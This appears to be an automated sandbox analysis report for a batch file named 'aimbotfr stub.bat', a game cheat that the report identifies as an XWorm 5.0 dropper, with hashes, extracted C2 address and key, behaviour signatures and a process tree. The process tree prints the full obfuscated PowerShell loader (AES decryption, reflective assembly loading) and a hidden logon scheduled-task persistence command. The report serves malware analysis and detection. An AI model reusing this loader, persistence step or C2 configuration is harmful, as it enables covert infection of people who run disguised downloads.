Analysis
-
max time kernel
95s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2024 21:15
Static task
static1
Behavioral task
behavioral1
Sample
aimbotfr stub.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
aimbotfr stub.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
aimbotfr stub.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
aimbotfr stub.bat
-
Size
478KB
-
MD5
09c4764995d1f2e96d0a228743f2425e
-
SHA1
0a755c43e147141ec0e9d96d243765af66d1e8a0
-
SHA256
c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab
-
SHA512
856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e
-
SSDEEP
6144:Y5uDX7kLnB9tGFQe+6YRAFcqLw7DT8ZUXtk9clnD:Yo8LB2FQh64AFcqLw7kZ+uInD
Malware Config
Extracted
xworm
5.0
80.76.49.227:9999
g0vzRORqzebeaKQj
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/1264-49-0x0000027EFC910000-0x0000027EFC91E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 1264 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 60 powershell.exe 1496 powershell.exe 1264 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 1108 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 60 powershell.exe 60 powershell.exe 1496 powershell.exe 1496 powershell.exe 1264 powershell.exe 1264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 60 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 powershell.exe Token: SeSecurityPrivilege 1496 powershell.exe Token: SeTakeOwnershipPrivilege 1496 powershell.exe Token: SeLoadDriverPrivilege 1496 powershell.exe Token: SeSystemProfilePrivilege 1496 powershell.exe Token: SeSystemtimePrivilege 1496 powershell.exe Token: SeProfSingleProcessPrivilege 1496 powershell.exe Token: SeIncBasePriorityPrivilege 1496 powershell.exe Token: SeCreatePagefilePrivilege 1496 powershell.exe Token: SeBackupPrivilege 1496 powershell.exe Token: SeRestorePrivilege 1496 powershell.exe Token: SeShutdownPrivilege 1496 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeSystemEnvironmentPrivilege 1496 powershell.exe Token: SeRemoteShutdownPrivilege 1496 powershell.exe Token: SeUndockPrivilege 1496 powershell.exe Token: SeManageVolumePrivilege 1496 powershell.exe Token: 33 1496 powershell.exe Token: 34 1496 powershell.exe Token: 35 1496 powershell.exe Token: 36 1496 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 powershell.exe Token: SeSecurityPrivilege 1496 powershell.exe Token: SeTakeOwnershipPrivilege 1496 powershell.exe Token: SeLoadDriverPrivilege 1496 powershell.exe Token: SeSystemProfilePrivilege 1496 powershell.exe Token: SeSystemtimePrivilege 1496 powershell.exe Token: SeProfSingleProcessPrivilege 1496 powershell.exe Token: SeIncBasePriorityPrivilege 1496 powershell.exe Token: SeCreatePagefilePrivilege 1496 powershell.exe Token: SeBackupPrivilege 1496 powershell.exe Token: SeRestorePrivilege 1496 powershell.exe Token: SeShutdownPrivilege 1496 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeSystemEnvironmentPrivilege 1496 powershell.exe Token: SeRemoteShutdownPrivilege 1496 powershell.exe Token: SeUndockPrivilege 1496 powershell.exe Token: SeManageVolumePrivilege 1496 powershell.exe Token: 33 1496 powershell.exe Token: 34 1496 powershell.exe Token: 35 1496 powershell.exe Token: 36 1496 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 powershell.exe Token: SeSecurityPrivilege 1496 powershell.exe Token: SeTakeOwnershipPrivilege 1496 powershell.exe Token: SeLoadDriverPrivilege 1496 powershell.exe Token: SeSystemProfilePrivilege 1496 powershell.exe Token: SeSystemtimePrivilege 1496 powershell.exe Token: SeProfSingleProcessPrivilege 1496 powershell.exe Token: SeIncBasePriorityPrivilege 1496 powershell.exe Token: SeCreatePagefilePrivilege 1496 powershell.exe Token: SeBackupPrivilege 1496 powershell.exe Token: SeRestorePrivilege 1496 powershell.exe Token: SeShutdownPrivilege 1496 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeSystemEnvironmentPrivilege 1496 powershell.exe Token: SeRemoteShutdownPrivilege 1496 powershell.exe Token: SeUndockPrivilege 1496 powershell.exe Token: SeManageVolumePrivilege 1496 powershell.exe Token: 33 1496 powershell.exe Token: 34 1496 powershell.exe Token: 35 1496 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2056 wrote to memory of 60 2056 cmd.exe 87 PID 2056 wrote to memory of 60 2056 cmd.exe 87 PID 60 wrote to memory of 1496 60 powershell.exe 89 PID 60 wrote to memory of 1496 60 powershell.exe 89 PID 60 wrote to memory of 4604 60 powershell.exe 91 PID 60 wrote to memory of 4604 60 powershell.exe 91 PID 4604 wrote to memory of 372 4604 WScript.exe 92 PID 4604 wrote to memory of 372 4604 WScript.exe 92 PID 372 wrote to memory of 1264 372 cmd.exe 94 PID 372 wrote to memory of 1264 372 cmd.exe 94 PID 1264 wrote to memory of 4436 1264 powershell.exe 103 PID 1264 wrote to memory of 4436 1264 powershell.exe 103 PID 4436 wrote to memory of 1108 4436 cmd.exe 105 PID 4436 wrote to memory of 1108 4436 cmd.exe 105
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\aimbotfr stub.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\aimbotfr stub.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_791_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_791.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_791.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_791.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Roaming\startup_str_791.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3637.tmp.bat""6⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:1108
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5eaa37f52aea06b09f25bf372644caa78
SHA13169bed248b204a5ac430bc1dee92e156b586cbb
SHA25640dd61cdf8dcaa558901712c6c0377cfe0c30cf5db14d2d951c556a107dc6ec2
SHA512125e7b974953efb0d631a00a67742da3abc60c5231435392b4668299aa10cbda08063fe39f0ab2e9f5c933ddf65f58e097e75cb9b8e95b6dfd42ea1cf171a0de
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
171B
MD5ec3f29d4acff0d2c43baf28c84b2354f
SHA1f60ab02603fc1309bb1b8a60def7187d520c4606
SHA2563a67a1bf07f3217890d642fa2b1cd23aad54d927cd075dfd07979d295c65a051
SHA512f69e1feed658a11d4892218dc4b72a45865110bb0b319053872188edb983adb32f0813a08d4e688073a093a738a7649e2f590a6db8421bbf235e0d4e31244942
-
Filesize
478KB
MD509c4764995d1f2e96d0a228743f2425e
SHA10a755c43e147141ec0e9d96d243765af66d1e8a0
SHA256c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab
SHA512856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e
-
Filesize
115B
MD5d2242e194bf2e9eb0a06b39125f7e552
SHA1ca8a1b2dcebea0efbcc792e008bf272bf6c8daf0
SHA256ab8358cd10c7fe628bbd79bbdae2a374f40f6daf2ecddb0e2310dfcb481c54b5
SHA512ca22ed96cd26a59c97c589645f98246ebb84b0d75b08f9ac5d90d326fbcc269ed0a0e67f6ad0294916ceaf75886c8dbf8b51014ac021bcbfd0596e4f1222d811